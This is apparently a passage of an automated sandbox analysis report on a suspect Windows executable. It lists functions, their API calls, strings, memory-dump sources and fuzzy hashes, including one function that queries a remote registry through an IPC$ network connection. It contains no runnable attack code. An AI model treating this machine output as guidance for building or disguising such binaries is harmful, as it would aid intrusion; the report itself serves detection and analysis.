                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                                                                                                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                                                                                                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                                                                                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                                                                                                                Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3218148540-0
                                                                                                                                                                                                                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                                                                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                                                                                                                Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 136442275-0
                                                                                                                                                                                                                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                                                                                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                                                                                                                Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004674FF
                                                                                                                                                                                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                                                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                • API String ID: 3104067586-3081909835
                                                                                                                                                                                                                • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                                                                                                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                                                                                                                Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                                                                                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                                                                                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                                                                                                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                                                                                                • API String ID: 440038798-2785691316
                                                                                                                                                                                                                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                                                                                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                                                                                                                Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004610A3
                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                                                                                                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                                                                                                                • String ID: ThumbnailClass
                                                                                                                                                                                                                • API String ID: 4136854206-1241985126
                                                                                                                                                                                                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                                                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                                                                                                                Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                                                                                                • String ID: 2
                                                                                                                                                                                                                • API String ID: 1331449709-450215437
                                                                                                                                                                                                                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                                                                                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                                                                                                                Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00460915
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                                                                                                                • API String ID: 3054410614-2561132961
                                                                                                                                                                                                                • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                                                                                                • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                                                                                                                Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                • API String ID: 600699880-22481851
                                                                                                                                                                                                                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                                                                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                                                                                                                Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
